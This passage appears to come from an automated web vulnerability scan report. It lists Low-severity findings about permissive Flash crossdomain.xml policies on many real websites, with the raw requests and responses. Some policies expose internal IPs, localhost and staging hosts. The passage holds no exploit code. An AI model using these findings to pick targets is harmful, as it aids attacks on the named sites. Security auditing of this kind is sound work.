Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.psu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Fri, 17 Oct 2008 10:07:40 GMT
ETag: "1958-7d-48f863ec"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.psu.edu"/>
<allow-access-from domain="*.wpsu.org"/>
</cross-domain-policy>

7.401. http://www.realage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=427
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

7.402. http://www.rei.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rei.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rei.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Jul 2008 16:16:21 GMT
Cache-Control: public, max-age=600, must-revalidate
Expires: Wed, 30 Mar 2011 16:40:03 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:55:40 GMT
Content-Length: 345
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.rei.com" sec
...[SNIP]...
<allow-access-from domain="rei.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.rei.com" secure="true"/>
...[SNIP]...

7.403. http://www.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:55 GMT
Server: Apache-Coyote/1.1
Expires: Sat, 02 Apr 2011 13:37:55 GMT
browser-expires: Sat, 2 Apr 2011 13:32:55 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 791
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

7.404. http://www.reverbnation.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reverbnation.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
Last-Modified: Wed, 30 Sep 2009 20:43:01 GMT
ETag: "23a-474d193a69f40"
Accept-Ranges: bytes
Content-Length: 570
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerCust15535_http_new=481582552.20480.0000; path=/

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   
   <site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="71.120.201.8" />
   
   <allow-access-from domain="reverbnation.com" />
   <allow-access-from domain="*.reverbnation.com" />
   
   <allow-access-from domain="tunehive.com" />
   <allow-access-from domain="*.tunehive.com" />
...[SNIP]...

7.405. http://www.rightathome.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rightathome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rightathome.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 26 Mar 2010 19:10:53 GMT
Accept-Ranges: bytes
ETag: "721d8e18cdca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 02 Apr 2011 14:14:09 GMT
Connection: close
Content-Length: 1075

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitt
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
...[SNIP]...
<allow-access-from domain="*.convertlanguage.com"/>
...[SNIP]...
<allow-access-from domain="www.espanol.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="espanol.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="espanol.staging.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="rightathome.com"/>
...[SNIP]...
<allow-access-from domain="*.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="enes.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="enes.staging.rightathome.com"/>
                <allow-access-from domain="translate-test.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="test.rightathome.com"/>
<allow-access-from domain="localhost"/>
...[SNIP]...

7.406. http://www.rivals.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rivals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rivals.com

Response

HTTP/1.1 200 OK
Content-Length: 221
Content-Type: text/xml
Last-Modified: Tue, 15 Jan 2008 16:52:54 GMT
Accept-Ranges: bytes
ETag: "0b75f129757c81:718"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rivals.com" />
</c
...[SNIP]...

7.407. http://www.rockyou.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:05 GMT
Server: Apache/2.2
Last-Modified: Wed, 19 Jan 2011 02:10:58 GMT
ETag: "4c0-49a29871cf080"
Accept-Ranges: bytes
Content-Length: 1216
Vary: Accept-Encoding,User-Agent
X-RyHeader: www164.rockyou.com took D=126 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...

7.408. http://www.rotoworld.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rotoworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rotoworld.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 22 Dec 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "08969791aa2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 579
Expires: Sat, 02 Apr 2011 13:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:58:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="166.70.44.60" />
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.allstarstats.com" />
<allow-access-from domain="*.sandbox.com" />
<allow-access-from domain="*.sandboxplus.com" />
<allow-access-from domain="*.gannettonline.com" />
<allow-access-from domain="*.eyewonder.com" />
...[SNIP]...

7.409. http://www.rottentomatoes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rottentomatoes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rottentomatoes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:07 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:22:02 GMT
ETag: "14b"
Accept-Ranges: bytes
Content-Length: 331
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rottentomatoes.com" />
<allow-access-from domain="rottentomatoes.com" />
...[SNIP]...

7.410. http://www.roxwel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.roxwel.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...

7.411. http://www.salesforce.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Date: Sat, 02 Apr 2011 13:45:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.salesforce.com" />
<allow-access-from domain="www.force.com" />
<allow-access-from domain="developer.force.com" />
<allow-access-from domain="salesforce.vo.llnwd.net" />
<allow-access-from domain="www3.stream.co.jp" />
<allow-access-from domain="salesforce.sitestream.com" />
<allow-access-from domain="*.jellyvision-conversation.com" />
...[SNIP]...

7.412. http://www.salon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.salon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Last-Modified: Mon, 09 Nov 2009 08:58:02 GMT
ETag: "fd"
Accept-Ranges: bytes
Content-Length: 253
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:40:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="salon.com" />
<allow-access-from domain="www.salon.com" />
<allow-access-from domain="images.salon.com" />
<allow-access-from domain="*.salon.com" />
...[SNIP]...

7.413. http://www.scholastic.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scholastic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scholastic.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 04 Nov 2009 23:57:02 GMT
ETag: "09bc980aa5dca1:417f"
Content-Length: 1384
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:10 GMT
Connection: close
Expires: Sat, 21 Nov 2009 02:33:32 GMT

<cross-domain-policy>
<allow-access-from domain="*.scholastic.com" secure="false"/>
<allow-access-from domain="*.brightcove.com" secure="false"/>
<allow-access-from domain="scholastic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.scholastic.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.playstream.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.thisispoint.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.interfuel.com" />
<allow-access-from domain="70.107.248.89" />
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...

7.414. http://www.sears.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sears.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Mar 2011 19:03:58 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:23:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:33 GMT
Content-Length: 2622
Connection: close
s-srvr:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sears.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*"/>
   <allow-access-from domain="*.cerosdevelopment.com"/>
   <allow-access-from domain="*.lightmakerorlando.com"/>
   <allow-access-from domain="*.richrelevance.com"/>
   <allow-access-from domain="*.blinds.net"/>
   <allow-access-from domain="*.zemoga.com"/>
   <allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kmart.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" />
...[SNIP]...

7.415. http://www.seattlepi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.seattlepi.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 228
Content-Type: text/xml
ETag: "9b1c2bc9396c81:fae"
Expires: Sat, 02 Apr 2011 13:32:09 GMT
Date: Sat, 02 Apr 2011 13:32:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.seattlepi.nwsource.com" />
...[SNIP]...

7.416. http://www.shangri-la.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shangri-la.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shangri-la.com

Response

HTTP/1.0 200 OK
Content-Length: 412
Content-Type: text/xml
Content-Location: http://www.shangri-la.com/crossdomain.xml
Last-Modified: Mon, 04 Oct 2010 03:28:26 GMT
Accept-Ranges: bytes
ETag: "f8ab31357463cb1:4f30"
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
Date: Sat, 02 Apr 2011 13:44:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.shangri-la.com" />
...[SNIP]...

7.417. http://www.shopathome.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shopathome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shopathome.com

Response

HTTP/1.1 200 OK
Content-Length: 273
Content-Type: text/xml
Last-Modified: Wed, 19 May 2010 23:27:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa OUR NOR PUR"
X-Server: Web03
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="shopathome.com" />
<allow-access-from domain="*.shopathome.com" />
...[SNIP]...

7.418. http://www.shopstyle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shopstyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shopstyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.13 (Unix)
Last-Modified: Tue, 17 Mar 2009 19:25:12 GMT
Accept-Ranges: bytes
